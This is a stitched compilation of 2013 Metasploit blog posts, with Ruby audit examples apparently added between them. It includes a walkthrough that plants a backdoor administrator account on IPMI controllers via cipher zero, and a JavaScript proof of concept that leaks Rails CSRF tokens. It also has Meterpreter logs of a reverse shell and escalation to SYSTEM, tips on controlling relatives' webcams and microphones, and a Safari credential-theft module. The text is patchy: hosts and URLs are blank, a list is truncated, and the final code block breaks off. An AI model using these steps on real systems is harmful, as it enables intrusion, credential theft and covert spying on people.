
This post is the seventh in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.


Today is the last day of the year, so there's no better time to get all weepy and sentimental about Metasploit development over a glass or four of champagne. I continue to be amazed, honored, and humbled by the amount of talent, skill, and brute force labor that goes into keeping the Metasploit juggernaut rolling. With that, here's a quick stat check of what we've been up to.

Major Releases

We successfully published three major releases of Metasploit over the course of the year. April saw the release of Metasploit 4.6, which solidified full integration with the Kali Linux distribution as well as coverage for the OWASP Top 10 (2013 edition). In July, we released Metasploit 4.7, which introduced firewall egress testing and the automation oomph introduced by Metasploit Pro's MetaModules. In November, we published Metasploit 4.8, which boasts much better integration with Nexpose (Rapid7's delightful vulnerability scanner) for vulnerability validation capabilities.


New Content

Coincidentally, we ended the year in 2012 with exactly 2012 modules, across exploits, auxiliary and post modules, and payloads. We're ending 2013 with 2448 modules; that's just about 1.2 modules a day, every day. Major target categories that got attention were client-side browser and file format exploits (made easier now with the new BrowserExploitServer mixin), a bunch of new cross-platform web application server-side exploits, and of course the SAP modules that we've been yammering about since October. We also now have a huge trove of new SOHO router scanners and exploits, which are themselves a subset of our newly extended ARM and MIPS embedded device target support which Juan talked about yesterday.


More Meterpreters

OJ talked at length earlier this HaXmas about the Windows Meterpreter overhaul, but did you know that we've made significant advances with Java Meterpreter and landed the brand new and most excellent Python Meterpreter? Yep, and the Android Meterpreter is still coming along, too. It's been a great year all around for Metasploit payloads -- we have over 100 payloads new to 2013, so if you haven't peeked in on those lately, now's a fine time to catch up.


More Contributors

Finally, but most importantly, we've had some amazing support from the open source security community over 2013. We've had 204 committers over the year to Metasploit, more than any other year. The depth of talent, drive, and commitment among these committers really and truly does astound me every day. Y'all are the reason why Metasploit is where it is today.


The top 25 committers (according to git logs) are:

Name/Alias          Commit Count
Spencer McIntyre    47
Andras Kabai        34


And here are all the names and aliases of people who are credited with at least one commit this year: Jeff Jarmoc, Joe Vennix, g0tmi1k, Karn Ganeshen, scriptjunkie, Peter Toth, Nathan Einwechter, Matt Andreko, Doug P, root, agix, Ramon de C Valle, Console, Bruno Morisson, Charlie Eriksen, bwall, bcoles, shuckins-r7, schierlm, modpr0be, Markus Wulftange, xistence, smilingraccoon, Dejan Lukan, lsanchez-r7, rsmudge, Joshua J. Drake, Mekanismen, ChrisJohnRiley, Rick Flores (nanotechz9l) 12, SphaZ, Roberto Soares Espreto, bmerinofe, MrXors, timwr, Kacper Nowak, Thomas Hibbert, zeknox, AverageSecurityGuy, shellster, darknight007, Brandon Perry, lmercer, Ruslaideemin, KarnGaneshen, Geyslan G. Bem, dummys, jvennix-r7, kaospunk, Brian Wallace, SeawolfRN, Joshua Abraham, J.Townsend, Josh, doug, Robin Wood, dcbz, h0ng10, corelanc0d3r, Matteo Cantoni, salcho, f8lerror, TecR0c, Borja Merino, Jonathan Claudius, Boris, Sven Vetsch / Disenchant, sgabe, jonvalt, heyder, Joshua Harper, xard4s, Rich Lundeen, Brandon McCann, Ricardo Almeida, dougsko, Thomas McCarthy, Cristiano Maruti, John Sherwood, DoI, joernchen of Phenoelit, jamcut, Jon Hart, Alexandre Maloteaux, William Vu, jgor, Tod Beardsley, Davy Douhine, Shelby Spencer, ddouhine, Jonathan, Enrique A. Sanchez Montellano, Stephen Haywood, Charles Smith, trustedsec, ZeroChaos, Dhiru Kholia, Sean Verity, Daniele Martini, Patrick Webster, Thomas Ring, booboule, Tabassassin, Brandon Knight, T0X1C-1, Wolfgang Ettlinger, Frederic Basse, Ryan Wincey, CG, Jose Selvi, Nicholas Davis, joe, Trevor Rosen, Norbert Szetei, rbsec, Fernando Arias, Tyler Krpata, nemski, Henrik Kentsson, Joe Barrett, pyoor, Jonathan Rudenberg, Booboule, Trenton Ivey, Winterspite, ethicalhack3r, Alexia Cole, Rick Flores, Gerry Eisenhaur, Joe Rozner, Paul, MosDefAssassin, Till Maas, Geyslan Gregorio Bem, tkrpata, Vlatko Kosturjak, violet, Juushya, Icewall, Joff Thyer, yehualiu, Sagi Shahar, allfro, rogueclown, danielemartini, Artien Bel, Doug Prostko, Joshua Harper PI GCFE GCFA, Darren Martyn, Newpid0, Thorsten Fischer, Russell Sim, matthiaskaiser, zyx2k, TrustedSec, Matthias Kaiser, Joel Parish, julianvilas, jwpari, cbgabriel, Garret Picchioni, steponequit, Melih SARICA, Julian Vilas, Antoine, LinuxGeek247, ringt, farias-r7, bannedit, Nick Rivera, Stephen Fewer, Bouke van der Bijl, Gregory Man, TabAssassin, Sam Gaudet, luh2, Gary Spillman, Tonimir Kisasondi


Oh, that's some sweet, sweet SEO right there. Thanks to every single one of you for your contribution of your time and expertise to the Framework!


New Modules

Oh, and hey, we released the final Metasploit update for the year just now, too -- 13 new modules this week, including the versatile intelligence-gathering DNS scraper module from zeknox and an exploit for Red Hat CloudForms from Ramon. Thanks guys!


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.


This year, infosec superstars Dan Farmer and HD Moore have been making an impressive effort to spread warnings about Baseboard Management Controllers (BMCs), which provide remote management capabilities for servers and are installed in nearly all servers manufactured today, and the Intelligent Platform Management Interface (IPMI), the server management protocol running on the BMC. Dan Farmer published a paper on IPMI and BMC security, disclosing several issues found while reviewing the security of the IPMI network protocol, which uses UDP port 623. HD put together a set of methods and Metasploit modules to exploit various of these issues. The issues include anonymous IPMI authentication due to default credentials, retrieval of password hashes, and authentication bypass on IPMI 2.0 through the use of cipher suite 0.

Let me remind you how to exploit the "Cipher 0" issue because it is nifty! You can just use the ipmi_cipher_zero module to identify systems that have cipher 0 enabled:

$ msfconsole
       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to> (256 hosts)
[+] VULNERABLE: Accepted a session open request for cipher zero
[+] VULNERABLE: Accepted a session open request for cipher zero
[+] VULNERABLE: Accepted a session open request for cipher zero
[+] VULNERABLE: Accepted a session open request for cipher zero

And then use the standard "ipmitool" command-line interface and a valid username to create a backdoor account:

$ ipmitool -I lanplus -H -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user set name 2 hdm
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user set password 2 password
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user priv 2 4
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user enable 2
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   hdm              true    false      true       ADMINISTRATOR
$ ssh hdm@
hdm@'s password: password
User:hdm logged-in to ILOMXQ3469216(
iLO 4 Advanced Evaluation 1.13 at  Nov 08 2012
Server Name: host is unnamed
Server Power: On


Simple and powerful! Remember, at the time of release Dan and HD found 53,000 IPMI 2.0 systems vulnerable to password bypass due to Cipher 0. If you haven't done so already, you might consider starting the year by reviewing the FAQ about the BMC and IPMI research, Dan's paper, and HD Moore's penetration tester's guide!!
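An added example (not code from the post or from Metasploit): the check a BMC owner would run to catch exactly the change made above, a Ruby audit of "ipmitool ... user list" output that flags enabled ADMINISTRATOR accounts missing from an allow-list and diffs a known-good listing against a fresh one. The two listings are constructed from the session above and the allow-list is an assumption.

```ruby
# Added example, not part of the post or of Metasploit: audit the table that
# `ipmitool ... user list` prints for accounts that should not be there, such
# as the slot that is renamed, given a password, raised to privilege 4
# (ADMINISTRATOR) and enabled in the session above.

# Column layout printed by `ipmitool user list`:
# ID  Name  Callin  Link Auth  IPMI Msg  Channel Priv Limit
USER_ROW = /\A(\d+)\s+(.+?)\s+(true|false)\s+(true|false)\s+(true|false)\s+(\S.*?)\s*\z/

# Parse the table into one hash per user slot.
def parse_user_list(output)
  lines = output.lines.map(&:chomp).reject { |l| l.strip.empty? }
  header = lines.shift
  raise ArgumentError, "not a user list table: #{header.inspect}" unless header =~ /\AID\s+Name/
  lines.map do |line|
    m = USER_ROW.match(line)
    raise ArgumentError, "unparseable row: #{line.inspect}" unless m
    { id: m[1].to_i, name: m[2], callin: m[3] == 'true', link_auth: m[4] == 'true',
      ipmi_msg: m[5] == 'true', priv: m[6] }
  end
end

# Names of enabled ADMINISTRATOR accounts that are not on the allow-list.
def unexpected_admins(output, allowed_admins)
  parse_user_list(output)
    .select { |u| u[:priv] == 'ADMINISTRATOR' && u[:ipmi_msg] }
    .map { |u| u[:name] }
    .reject { |name| allowed_admins.include?(name) }
end

# Slot-by-slot comparison of a known-good listing with a fresh one; every
# renamed slot, privilege change or IPMI-messaging toggle becomes one finding.
def diff_user_lists(before_output, after_output)
  before = parse_user_list(before_output).map { |u| [u[:id], u] }.to_h
  after  = parse_user_list(after_output).map { |u| [u[:id], u] }.to_h
  (before.keys | after.keys).sort.flat_map do |id|
    prev, cur = before[id], after[id]
    next ["slot #{id}: #{prev ? 'removed' : 'added'}"] if prev.nil? || cur.nil?
    %i[name priv ipmi_msg].reject { |f| prev[f] == cur[f] }
                          .map { |f| "slot #{id}: #{f} #{prev[f].inspect} -> #{cur[f].inspect}" }
  end
end

# Constructed from the two listings in the session above.
BASELINE_LIST = <<~TXT
  ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
  1   Administrator    true    false      true       ADMINISTRATOR
  2   (Empty User)     true    false      false      NO ACCESS
TXT

CURRENT_LIST = <<~TXT
  ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
  1   Administrator    true    false      true       ADMINISTRATOR
  2   hdm              true    false      true       ADMINISTRATOR
TXT

if __FILE__ == $0
  puts "unexpected admins: #{unexpected_admins(CURRENT_LIST, ['Administrator']).inspect}"
  puts diff_user_lists(BASELINE_LIST, CURRENT_LIST)
end
```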


Not content with this research, later this same year HD Moore published the results of a security analysis of the Supermicro IPMI firmware, used in the baseboard management controller (BMC) of many Supermicro motherboards. In this analysis HD found usage of static encryption keys, hardcoded credentials, and several issues in the web management interface, including overflows, of course!


Exploiting memory corruption on these ARM-based embedded devices is really a challenging exercise which includes emulation, live exploitation, and keeping a lot of assembly in your head! If you would like to dig into the details, we published a write-up of that exploitation journey too!


All in all, an impressive body of research which is worth checking carefully. In the meantime, I'm pretty sure these heavyweights will be working on more awesome stuff... can't wait to see what 2014 offers the security community!

This post is the fifth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

Several weeks ago, Egor Homakov wrote a blog post pointing out a common info leak vulnerability in many Rails apps that utilize Remote JavaScript. The attack vector and implications can be hard to wrap your head around, so in this post I'll explain how the vulnerability occurs and how to exploit it.

What is Remote Javascript?

Remote JavaScript (RJS) was a pattern prescribed by Rails < 2 to implement dynamic web sites. In RJS the user-facing parts of a website (HTML and JS) act as a "dumb client" for the server: when dynamic action is needed, the client calls a JavaScript helper that sends a request to the server. The server then performs the necessary logic and generates and responds with JavaScript code, which is sent back to the client and eval()'d.

The RJS approach has some advantages, as Rails creator dhh points out in a recent blog post. However, suffice it to say that RJS breaks down as soon as you need complex client-side code, and a server API that responds with UI-dependent JavaScript is not very reusable. So Rails has mostly moved away from the RJS approach (JSON APIs and client-heavy stacks are the new direction), but still supports RJS out of the box.

So what's the problem?

Unfortunately, RJS is insecure by default. Imagine a developer on a Rails app that uses RJS is asked to make an Ajax-based login pop-up page. Following the RJS pattern, the developer would write some JavaScript that, when the "Login" link is clicked, asks the remote server what to do. The developer would add a controller action to the Rails app that responds with the JavaScript required to show the login form:

class Dashboard < ApplicationController
  def login_form
    respond_to do |format|
      # answer .js requests with the RJS partial below
      format.js do
        render :partial => 'show_login_form'
      end
    end
  end
end

Following the RJS pattern, the show_login_form.js.erb partial returns some JavaScript code to update the login form container:

$("#login").show().html("<%= escape_javascript(render :partial => 'login/form') %>")

Which, when rendered, produces code such as:

  <form action='/login' method='POST'>
  <input type='hidden' name='auth_token' value='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'>
          <td><input type='text'></td>
          <td><input type='password'></td>
  </form>

Now imagine user Tom is logged into the Rails app (which we'll say is served from An unrelated website might serve Tom the following code:

    <script src=''></script>

Because <script> tags are allowed to be cross-origin (this is useful for CDNs), Tom's browser happily sends a GET request to, attaching his cookie. The RJS script is generated and returned to Tom, and his browser executes it. By stubbing out the necessary functions in the global scope, can easily gain access to the string of HTML that is sent back:

      <script>
      // stub out the jQuery-style helpers the RJS response calls, so that the
      // html() call hands the rendered login form (auth_token included) to this page
      function $() {
        return {
          show: function() {
            return {
              html: function(str) {
                window.leakedHtml = str;
              }
            };
          }
        };
      }
      </script>
    <script src=''></script>

And now can easily parse out Tom's CSRF auth token and start issuing malicious CSRF requests to This means that can submit any form in The same technique can be used to leak other information besides the auth token, including logged-in status, account name, etc.

As a pentester, how can I spot this bug while auditing a web app?

It is pretty easy to find this vulnerability. Click around a while in the web app and keep Web Inspector's Network tab open. Look for .js requests sent sometime after a page load. Any response to a .js request that includes private info (auth token, user ID, existence of a login session) can be "hijacked" using an exploit similar to the above PoC.

How can I fix this in my web app?

The fix prescribed by Rails is to go through your code and add request.xhr? checks to every controller action that uses RJS. This is annoying, and is a big pain if you have a large existing code base that needs patching. Since Metasploit Pro was affected by the vulnerability, we needed a patch quickly. So I present our solution to the vulnerability - we now check all .js requests to ensure that the REFERER header is present and correct. The only downside here is that your app will break for users behind proxies that strip referers. Additionally, this patch will not work for you if you plan on serving cross-domain JavaScript (e.g. for a hosted JavaScript SDK). If you can stomach that sacrifice, here is a Rails initializer that fixes the security hole. Drop it in ui/config/initializers of your Rails app:

# This patch adds a before_filter to all controllers that prevents xdomain
# .js requests from being rendered successfully.

module RemoteJavascriptRefererCheck
  extend ActiveSupport::Concern

  included do
    require 'uri'
    # only run the check for requests that will be answered with JavaScript
    before_filter :check_rjs_referer, :if => ->(controller) { controller.request.format.js? }
  end

  # prevent generated rjs scripts from being exfiltrated by remote sites
  # see
  def check_rjs_referer
    referer_uri = begin
      URI.parse(request.referer)
    rescue URI::InvalidURIError
      nil
    end

    # if request comes from a cross domain document
    if referer_uri.blank? or
      (request.host.present? and referer_uri.host != request.host) or
      (request.port.present? and referer_uri.port != request.port)

      head :unauthorized
    end
  end
end

# shove the check into the base controller so it gets hit on every route
ApplicationController.class_eval do
  include RemoteJavascriptRefererCheck
end

And your server will now return a 500 error to any RJS request that does not contain the correct REFERER. A gist is available here, just download and place in $RAILS_ROOT/config/initializers.
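As an added example (not the initializer above, and not code from the post), here is the same-origin Referer test lifted out of Rails so it can be run against a table of constructed requests, side by side with the request.xhr? check that Rails recommends. It shows which of the two checks stops the cross-origin script-tag load, and that only the Referer check also rejects a legitimate Ajax call whose Referer a proxy has stripped; the host name, port and request headers are made up for the example.

```ruby
require 'uri'

# Added example, not the initializer from the post: its Referer test and the
# request.xhr? test Rails recommends, applied to constructed requests. A request
# is a Hash of header name => value; `host`/`port` stand in for request.host and
# request.port.

# Referer test (what check_rjs_referer in the initializer does).
def cross_origin_referer?(referer, host, port)
  return true if referer.nil? || referer.strip.empty?   # absent, or stripped by a proxy
  uri = URI.parse(referer)
  return true unless %w[http https].include?(uri.scheme) && uri.host
  return true unless uri.host.casecmp?(host)             # another site, or a subdomain
  uri.port != port                                       # URI supplies 80/443 when omitted
rescue URI::InvalidURIError
  true                                                   # unparseable: treat as foreign
end

# request.xhr? test: true only when the XMLHttpRequest marker header is present.
# A <script src=...> load is a plain fetch by the browser and never carries it.
def xhr_request?(headers)
  headers['X-Requested-With'] == 'XMLHttpRequest'
end

# May a format.js response be rendered for this request under the given strategy?
def allow_rjs?(headers, host:, port:, strategy:)
  case strategy
  when :referer then !cross_origin_referer?(headers['Referer'], host, port)
  when :xhr     then xhr_request?(headers)
  else raise ArgumentError, "unknown strategy #{strategy.inspect}"
  end
end

# Constructed requests for a .js action of an app at https://app.example.test (port 443).
REQUESTS = {
  # the attack: Tom's browser fetching <script src="https://app.example.test/...js">
  # from a page on another site; cookies are attached, but no XHR marker
  script_tag_from_evil:  { 'Referer' => 'https://evil.example.test/' },
  # the app's own Ajax helper calling the same action
  legit_xhr:             { 'Referer' => 'https://app.example.test/dashboard',
                           'X-Requested-With' => 'XMLHttpRequest' },
  # the same Ajax call through a proxy that strips Referer (the downside the post notes)
  legit_xhr_no_referer:  { 'X-Requested-With' => 'XMLHttpRequest' },
  # a page on the same host name but a different port is still another origin
  script_tag_other_port: { 'Referer' => 'https://app.example.test:8443/' },
}.freeze

# Returns { request_name => { referer: allowed?, xhr: allowed? } }.
def compare_strategies(host = 'app.example.test', port = 443)
  REQUESTS.transform_values do |headers|
    { referer: allow_rjs?(headers, host: host, port: port, strategy: :referer),
      xhr:     allow_rjs?(headers, host: host, port: port, strategy: :xhr) }
  end
end

if __FILE__ == $0
  compare_strategies.each { |name, result| puts "#{name}: #{result.inspect}" }
end
```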

This post is the fourth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

Every year during a major holiday, we crawl out from our own bat cave and actually spend time with our family and friends. People start asking you what you do for a living. You respond with something you probably regret, like "I am a penetration tester", because to an average person your job title probably sounds no different from a porn star, or someone who can start a fire with their thoughts. After some clarification, they kind of grasp what you do: apparently you do something magical with them computers. And then the inevitable happens: your ma and pa, brothers and sisters, your uncle, and even the neighbor come to you and ask you to fix their computers, or maybe do a demonstration like blowing up a computer as in the movie "Live Free or Die Hard" they just saw.


Let's face it, you are your family's computer wizard, and it's time to put your skills to "good use", like fixing their computers and getting them educated about the risks of accepting candy from strangers on the Internet. If you're a little overwhelmed, fear no more, because with Metasploit in hand you can do ANYTHING... well, almost anything. Here are a few common tricks that we actually find practical during a family reunion:


Lost File, Please Recover!


Metasploit has two extremely handy data recovery tools you can use. The first one is post/windows/gather/forensics/recovery_files.rb, brought to you by Borja Merino. The other is post/windows/gather/forensics/imager.rb, by Wesley McGrew.


The recovery_files module basically tries to recover files that got recently deleted. Borja already made a video while making the module, so we'll let the video do the talking:




The imager module functions a little bit like the dd command in Unix, except this one is for Windows, since it uses the Windows API (via railgun). It performs byte-for-byte imaging of remote disks and volumes. Byte-for-byte imaging is obviously a time-consuming task, so we advise leaving this option for last.


What's the wireless password again?


Say everybody comes home for the holiday, and they've brought in all kinds of gadgets (XBOX One, Kindle Reader, laptops, smart phones, etc). Hey ma, what's the Wifi password? Your parents might not actually know the answer to that, and they blame the technician who set up the network months ago... or was it years ago? Your mission: to find the wifi password.


You can most likely do this by physically connecting to the wireless router and resetting the password that way. Or, on your parents' laptop, you can try the post/windows/wlan/wlan_profile post module to see if you can extract the passphrase from the keyMaterial element in the wifi profile.


Forgotten Administrator Password?


Sometimes it's almost impossible for regular human beings, like your family, not to forget a password. The most common way to deal with this is to reset it locally, often with a bootable disk (depending on the system). However, it is also possible to simply escalate privileges with whatever user account you have, and go from there. The most basic way is by using the "getsystem" command in meterpreter. If that doesn't work, you can try to pick a local exploit module like ppr_flatten_rec:


msf exploit(handler) > run

[*] Started reverse handler on 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to
[*] Meterpreter session 2 opened ( -> at 2013-12-25 16:30:04 -0600

meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\sinn3r
meterpreter > background
[*] Backgrounding session 2...

msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec 

msf exploit(ppr_flatten_rec) > set session 2
session => 2
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 
[*] Launching notepad to host the exploit...
[+] Process 3784 launched.
[*] Reflectively injecting the exploit DLL into 3784...
[*] Injecting exploit into 3784 ...
[*] Exploit injected. Injecting payload into 3784...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[*] Sending stage (769024 bytes) to
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened ( -> at 2013-12-25 16:31:32 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


If you actually managed to escalate privileges, do them a favor and run a system update too while you're at it :-)



Hollywood Hacking for Entertainment


We haven't figured out how to remotely blow up a computer, but here are a few modules that make hacking easy to understand and fun. Surprisingly, kids love playing with these:



Webcam manipulation


Controlling a webcam is pretty much standard in Hollywood hacking, and you can do that with Metasploit too. Modules such as post/windows/manage/webcam or post/osx/manage/webcam, or the webcam_snap meterpreter command, are great for this. It's not as awesome as Chatroulette like the one to the left though :-)


Microphone manipulation


Metasploit is also capable of audio recording. You can use the post/osx/manage/record_mic module, or post/multi/manage/record_mic.


Video Broadcasting


And of course, who can pass on the opportunity of rickrolling everybody on a holiday?


There are also plenty of Metasploit modules you can use for entertainment purposes; we encourage all of you to browse around our post module directory tree. But if you don't see anything you like, you can always file a feature request on Redmine and let us know. Or please feel free to submit your own :-)


As always, remember to run that msfupdate command to make sure you are up to date with Metasploit. For those of you who are new to Metasploit, you can download a copy here, and may the force be with you.

This post is the third in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.


Over the last quarter of 2013, we here in the Democratic Freehold of Metasploit found that we needed to modernize our flagship remote access toolkit (RAT), Meterpreter. That started with cleaving Meterpreter out of the main Metasploit repository and setting it up with its own repository, and then bringing in a dedicated Meterpreter hacker, the indomitable OJ TheColonial Reeves. We couldn't be happier with the results so far.


OJ has kindly written up an extensive report of what all he's worked on with Meterpreter and post-exploitation on Windows hosts over on his blog. I encourage you to head on over there and read his 3 Months of Meterpreter. For bullet points, the TL;DR is:


  • A Sane Build Environment

The biggest complaint we used to get about Meterpreter is the pain and suffering one had to go through just to build the darn thing. OJ has reworked all that from soup to nuts, and now Meterpreter builds cleanly and easily using Microsoft Visual Studio Express. If this is your complaint as well, please take a look at the README and marvel at the single 'make' command that kicks things off.


  • Rock Solid Stability

Sometimes, Meterpreter would crash out on the target, often for mysterious reasons. No longer! OJ tackled pretty much all of the outstanding bugs having to do with Meterpreter stability, and it's better than ever now.



  • Securification

Metasploit bread-and-butter exploits tend to be classic stack buffer overflows... so after a code audit, we've patched up all the obvious paths to remote code execution with Meterpreter. While we haven't proven exploitability with the old Meterpreter, we're pretty confident today that you won't get your sessions jacked out from under you by a rival pen-tester. Note, if you're able to successfully subvert a Meterpreter installation, we'd sure appreciate a Metasploit module proving it...


  • Enhanced Local Exploits

We've moved the KiTrap0D exploit out of the path for 'getsystem', and promoted it to a proper local exploit for privilege escalation; this has the result of making 'getsystem' procedures a lot more stable in the usual cases, leaving it to the penetration tester to decide if she wants to explore additional avenues of escalating to system privileges. Thanks to the submodule-ing of Stephen Fewer's ReflectiveDLLInjection strategy, we've also refactored the ppr_flatten_rec exploit to be a lot more reliable, as well.


  • Bunches of New Features

Along the way with making existing Meterpreter functionality more reliable and easier to use, we've added two heaping handfuls of new functionality; better IPv6 support, refreshed Incognito and mimikatz implementations, more robust environment variable enumeration, a new "Extended API" extension (which incidentally provides a nice roadmap on how to write Meterpreter extensions in general), a framework for interrogating ADSI, and so much more.


  • Readable Documentation

Finally, Meterpreter ships with inline, automatically generated documentation using Doxygen, a pretty standard syntax for annotation-based docs. Since you can easily generate the latest docs locally, you no longer have to rely on (or get misled by) outdated API docs when hacking on Meterpreter.


Again, there's tons of detail on all this in OJ's post, so if this kind of thing excites you, feel free to roll up your sleeves and dive into Meterpreter's guts. Payload integration in general is kind of what puts the "meta" in Metasploit -- having all this available to exploit developers and penetration testers should make security R&D move along much faster and cleaner, and get you from proof-of-concept to functional shells in real world situations with less time and effort.


Happy haXmas!

This post is the second in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.

If you are reading this blog post, I reckon you are somewhat of a geeky security person, and you use some sort of application like KeePass, Keychain, LastPass, etc, to manage your passwords. After all, we all know too well that password stealing is a major security issue, and sometimes this is more than enough to get you to all kinds of wonderful places like the domain controller, the CEO's laptop, and all the goodies along the way. It also makes my heart die a little (in a good way, I guess?) when I hear of professional penetration testers compromising the entire network by just stealing passwords, reuse or pass-the-hash and all that, while we spend intense amounts of time building awesome exploits that they don't actually have to use. I mean, come on, man! :-) But of course, Metasploit creates more than just exploits, it covers the whole offensive package, so password stealing is definitely always on the menu.


Recently, I came across an article from SecureList about the discovery of Apple Safari storing session states unencrypted. The "ah-ha, jackpot!" moment kicked in because stuff like this is such an easy win, and I decided to take a look. The problem is simple: Apple Safari has this feature that allows you to reopen all the windows from the last session with a click on a button, and the magic behind that is storing these session states in a file named LastSession.plist. This is a binary property list that can be manually converted into a more human-readable format by using the built-in plutil command in OS X, and then your session data can be found encoded in Base64. And you don't really have to be a computer genius to decode this; there are tools available online, just let me google that for ya.


And yes, I also just described how to write that module. I have been told the best crackers in the world can write this in under 60 minutes, but fortunately I've already written it for you, so you can steal this in under 60 seconds. Woohoo!


Another eye-candy thing is that the researcher who made the discovery (Mr. Vyacheslav Zakorzhevsky) demonstrated stealing a Gmail credential with the flaw; his screenshot is this:


Look closely, and you'll see words like "Email=kaspersky_login&Passwd=kaspersky_passwd", "application/x-www-form-urlencoded", ""... yeah, those are quite lovely. In case you're curious where this data is from, you can simply find it in Google's login form, specifically at, I hope you like HTML:




To trigger Safari storing your session data, here's an example of how to do that safely in case you want to test it yourself:


  1. Go to
  2. Enter an invalid username and password, click "Sign In"
  3. Google should tell you the credential is bad, now press refresh.


And now that session state should be stored in ~/Library/Safari/LastSession.plist. If you're lazy like me, you can just run Metasploit's post/osx/gather/safari_lastsession module:




The above test was conducted against Apple Safari version 7.0.1 (9537.73.11) on OS X 10.9.1. Yes, it is the latest version of Safari. Yes, someone did say this was patched in Safari 6.1, except not really. We've already informed the appropriate party to verify this patch information, and I'm sure this will be resolved shortly. Meanwhile, if you are a Safari user, please do this:


  1. Open Safari
  2. On your top left corner, click on "Safari" -> "Preferences"
  3. Click on the "Privacy" tab, and you should see the following - I want you to click that "Remove All Website Data" button real hard and make sure your LastSession.plist is cleared:




Last but not least, if you're still wondering if LastSession.plist is still storing some sensitive data, you can always run the Metasploit module and test it out yourself. Metasploit can be downloaded here if you're new to the game. If you are already a Metasploit user, please make sure to run the msfupdate and that baby will be yours.


Oh, and if you do actually extract some username/password, remember to clear your ~/.msf4/loot/ directory. Because the username/password (in plain text) will be stored there, too. The post module should tell you precisely where this file is.
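To check a LastSession.plist yourself for the kind of stored form data described above, here is an added Ruby example (not the Metasploit module, and not code from the post). It assumes the plist has first been converted with plutil (plutil -convert xml1 -o - ~/Library/Safari/LastSession.plist) and that each tab's Base64 blob sits under a SessionState key next to a TabURL key; those key names, the decoded blob layout and the sample plist are constructed for the example, and password-like values are redacted in what it reports.

```ruby
require 'rexml/document'

# Added example, not the Metasploit module or code from the post: look inside a
# LastSession.plist (converted to XML with `plutil -convert xml1 -o - <file>`)
# for Base64-encoded tab state that still carries a submitted login form.
# Key names (TabURL, SessionState), the blob layout and the sample plist below
# are constructed for this example.

# key=value&key=value bodies, stored next to the form's content type
FORM_BODY  = /([A-Za-z0-9_.\-]+=[^&\s\x00]*(?:&[A-Za-z0-9_.\-]+=[^&\s\x00]*)+)/
SECRET_KEY = /pass|pwd|secret|token/i

# Every decoded SessionState blob, paired with the TabURL from the same <dict>.
def session_states(plist_xml)
  doc = REXML::Document.new(plist_xml)
  states = []
  REXML::XPath.each(doc, '//dict') do |dict|
    url = blob = nil
    dict.elements.to_a.each_slice(2) do |key, value|   # plist dicts alternate key/value
      next unless key.name == 'key' && value
      case key.text
      when 'TabURL'       then url  = value.text.to_s.strip
      when 'SessionState' then blob = value.text.to_s.unpack1('m')   # Base64 decode
      end
    end
    states << { url: url, bytes: blob } if blob
  end
  states
end

# Form bodies found in urlencoded session state, with password-like values redacted.
def credential_findings(plist_xml)
  session_states(plist_xml).flat_map do |state|
    text = state[:bytes]
    next [] unless text.include?('application/x-www-form-urlencoded')
    text.scan(FORM_BODY).flatten.map do |body|
      fields = body.split('&').map { |kv| kv.split('=', 2) }
      names  = fields.map(&:first)
      { url: state[:url],
        fields: names,
        secret_fields: names.grep(SECRET_KEY),
        redacted: fields.map { |k, v| k =~ SECRET_KEY ? "#{k}=<redacted>" : "#{k}=#{v}" }.join('&') }
    end
  end
end

# Constructed tab state: a WebKit form-data record for a failed login, as in the
# screenshot described above (all values made up).
CONSTRUCTED_STATE = ("\x00\x00\x00\x03WebKitFormData\x00application/x-www-form-urlencoded\x00" +
                     "Email=alice%40example.test&Passwd=hunter2\x00").b

CONSTRUCTED_PLIST = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <plist version="1.0">
  <dict>
    <key>SessionWindows</key>
    <array>
      <dict>
        <key>TabStates</key>
        <array>
          <dict>
            <key>TabURL</key>
            <string>https://accounts.example.test/ServiceLogin</string>
            <key>SessionState</key>
            <data>#{[CONSTRUCTED_STATE].pack('m0')}</data>
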